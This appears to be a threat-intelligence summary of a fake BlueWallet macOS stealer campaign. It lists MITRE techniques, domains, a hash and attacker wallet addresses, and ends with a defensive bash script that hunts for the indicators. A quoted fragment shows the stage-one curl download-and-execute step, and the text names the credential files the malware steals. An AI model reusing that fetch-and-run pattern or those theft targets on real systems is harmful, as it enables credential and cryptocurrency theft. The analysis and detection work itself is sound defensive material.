Fake BlueWallet steals passwords, accounts, and crypto from Macs

A fake BlueWallet site at update-bluewallet[.]com impersonates the real Bitcoin wallet to trick Mac users into downloading and manually running an AppleScript that installs a credential-stealing implant. The malware can steal browser logins, wallets, files, and clipboard cryptocurrency addresses, then exfiltrate data and accept commands through Telegram.

Keypoints

  • Attackers used a fake BlueWallet download site to impersonate the legitimate Bitcoin wallet and target Mac users.
  • The campaign relied on social engineering, urging victims to open a downloaded AppleScript in Script Editor and press Run.
  • Stage one downloaded a second-stage script to /tmp/.sysupd.sh and executed it silently in the background.
  • The malware stole browser data, cryptocurrency wallet data, password manager data, cloud and SSH credentials, and selected documents.
  • It hijacked the clipboard by replacing copied Bitcoin, Ethereum, or Solana addresses with attacker-controlled addresses.
  • Persistence was established through a LaunchAgent in ~/Library/LaunchAgents, allowing the implant to run at login.
  • Command-and-control and exfiltration were handled through Telegram Bot API channels, with support for commands like /info, /exec, /download, and /selfdestruct.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The victim had to open the downloaded AppleScript and press Run/⌘R for the malware to execute (‘open the installer, then press the play button or ⌘R’ / ‘the victim trusts what they are seeing’).
  • [T1059.002] AppleScript – The attack used a malicious AppleScript as the first-stage downloader and execution vehicle (‘The page does something quietly clever… the victim is about to see’ / ‘The AppleScript itself is remarkably short’).
  • [T1059.004] Unix Shell – The AppleScript ran a base64-encoded shell command to fetch and execute the payload (‘it runs a single base64-encoded shell command’).
  • [T1105] Ingress Tool Transfer – Stage one downloaded the second-stage script from a remote host to /tmp/.sysupd.sh (‘curl -s … -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh’).
  • [T1027] Obfuscated Files or Information – The script hid configuration using XOR-decoded values and base64 encoding (‘Its configuration is obfuscated, but weakly’ / ‘base64-encoded shell command’).
  • [T1036] Masquerading – The malware disguised itself as a system update file and used BlueWallet branding to appear legitimate (‘the filename .sysupd.sh is dressed up to look like a system update’ / ‘stolen the name and branding’).
  • [T1056.001] Input Capture: Keylogging – The malware prompted for the user’s password and validated attempts, capturing the credential (‘asks the user to re-enter their password’).
  • [T1115] Clipboard Data – It continuously monitored the clipboard to detect and replace cryptocurrency addresses (‘continuously inspects the clipboard’ / ‘overwrites the clipboard with the attacker’s address via pbcopy’).
  • [T1547.001] Boot or Logon Autostart Execution: Launch Agent – Persistence was established by writing a LaunchAgent plist in ~/Library/LaunchAgents (‘It establishes persistence by writing a LaunchAgent plist’).
  • [T1053.005] Scheduled Task/Job: Launch Agent – The LaunchAgent was loaded so the implant would run again at every login (‘loading it with launchctl so the implant runs again at every login’).
  • [T1074.001] Data Staged: Local Data Staging – The malware staged stolen data into archives before exfiltration (‘archives the staged data with macOS’s own ditto’).
  • [T1029] Scheduled Transfer – It split larger archives into 49 MB chunks to fit Telegram upload limits (‘it breaks larger archives into 49 MB chunks’).
  • [T1567.002] Exfiltration to Cloud Storage – Data was sent through Telegram’s infrastructure, which served as the exfiltration channel (‘The command channel rides Telegram’s Bot API’).
  • [T1090.001] Proxy: Internal Proxy – Telegram Bot API was used as an intermediary command channel that helped blend traffic into legitimate HTTPS (‘it is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic’).
  • [T1057] Process Discovery – The script checked for presence of cloud/SSH-related files and app data across the system (‘look for credentials and configuration files’).
  • [T1005] Data from Local System – It collected browser data, wallet data, notes, and documents from the local machine (‘they pull from six broad categories’).

Indicators of Compromise

  • [Domains] fake BlueWallet lure and payload host – update-bluewallet[.]com, projects2026box[.]com
  • [File names] downloaded and hidden scripts – BlueWallet Installer.applescript, /tmp/.sysupd.sh
  • [File hash (SHA-256)] known sample hash for the stage-one script – 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61
  • [Clipboard wallet addresses] attacker-controlled replacement addresses used for BTC/ETH/SOL hijacking – bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e, 0x2B871703122064e45d77146a6D5203da3bD192FA, and 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v
  • [Persistence path] macOS autostart location used by the implant – ~/Library/LaunchAgents, hidden support directory
  • [Credential-related paths] files and directories searched for cloud and SSH secrets – .ssh, .aws, .gnupg, .kube
  • [Browser/utility artifacts] targeted local data sources and note databases – NoteStore.sqlite, .zsh_history, .bash_history
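As an added defender-side example (not code from the Malwarebytes article, and not BlueWallet's own), the bash helper below turns the Keypoints and the indicator list above into host checks: it flags LaunchAgent plists that reference the dropper path, the lure or payload domains, or any hidden script under /tmp (the last pattern is an assumption that generalizes the .sysupd.sh case), compares a file's SHA-256 against the stage-one hash reported here, and detects the clipper's signature, a copied address that comes back as a different, attacker-owned one. The plist contents and clipboard strings it is exercised with are constructed samples.

```bash
#!/usr/bin/env bash
# Added example: hunt helpers built from the indicators on this page.
# Indicator values below are copied from the page; everything else is
# illustrative and assumed.

# Lure/payload domains (defanged on the page as name[.]com).
IOC_DOMAINS="update-bluewallet.com projects2026box.com"
# Hidden second-stage dropper path.
IOC_PATHS="/tmp/.sysupd.sh"
# SHA-256 of the stage-one script reported on the page.
IOC_SHA256="216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61"
# Attacker-controlled replacement addresses (BTC, ETH, SOL).
IOC_ADDRESSES="bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e 0x2B871703122064e45d77146a6D5203da3bD192FA 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v"

# scan_launchagents DIR
# Inspect every *.plist in DIR (normally ~/Library/LaunchAgents). A plist is
# reported if it contains a known indicator, or (assumed generic rule) if it
# points at a dotfile script under /tmp. Returns 0 when something suspicious
# was found so callers can alert, 1 when the directory looks clean.
scan_launchagents() {
    dir="$1"
    status=1
    for plist in "$dir"/*.plist; do
        [ -f "$plist" ] || continue
        reason=""
        for ioc in $IOC_PATHS $IOC_DOMAINS; do
            if grep -qF -- "$ioc" "$plist"; then
                reason="known indicator $ioc"
                break
            fi
        done
        # Generic check: a login item executing a hidden script out of /tmp.
        if [ -z "$reason" ] && grep -qE -- '/tmp/\.[A-Za-z0-9_.-]+' "$plist"; then
            reason="hidden script under /tmp"
        fi
        if [ -n "$reason" ]; then
            printf 'suspicious LaunchAgent %s: %s\n' "$plist" "$reason"
            status=0
        fi
    done
    return "$status"
}

# check_dropper_hash FILE
# Compare FILE's SHA-256 with the stage-one hash from the page.
# Returns 0 on match, 1 on mismatch, 2 if no hashing tool is available.
check_dropper_hash() {
    file="$1"
    if command -v sha256sum >/dev/null 2>&1; then
        sum=$(sha256sum "$file" | cut -d' ' -f1)
    elif command -v shasum >/dev/null 2>&1; then
        sum=$(shasum -a 256 "$file" | cut -d' ' -f1)
    else
        return 2
    fi
    [ "$sum" = "$IOC_SHA256" ]
}

# is_attacker_address ADDR
# Returns 0 if ADDR is one of the known replacement addresses.
is_attacker_address() {
    for a in $IOC_ADDRESSES; do
        [ "$1" = "$a" ] && return 0
    done
    return 1
}

# clipboard_swapped COPIED CURRENT
# The clipper's signature: the user copied COPIED, but the clipboard now
# holds CURRENT, which differs and is an attacker-owned address.
# Returns 0 when a swap is detected, 1 otherwise.
clipboard_swapped() {
    [ "$1" != "$2" ] && is_attacker_address "$2"
}

# On a Mac, run `./hunt.sh --scan` to check the current user's LaunchAgents.
if [ "${1:-}" = "--scan" ]; then
    scan_launchagents "$HOME/Library/LaunchAgents"
fi
```

The LaunchAgent scan deliberately stops at string matching rather than parsing the plist, so it also catches binary-format or malformed plists that `plutil` would reject; for a production detection you would pair it with a check of what `launchctl list` actually has loaded, since the article notes the implant loads its agent with launchctl immediately rather than waiting for the next login.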
Read more: https://www.malwarebytes.com/blog/threat-intel/2026/06/fake-bluewallet-steals-passwords-accounts-and-crypto-from-macs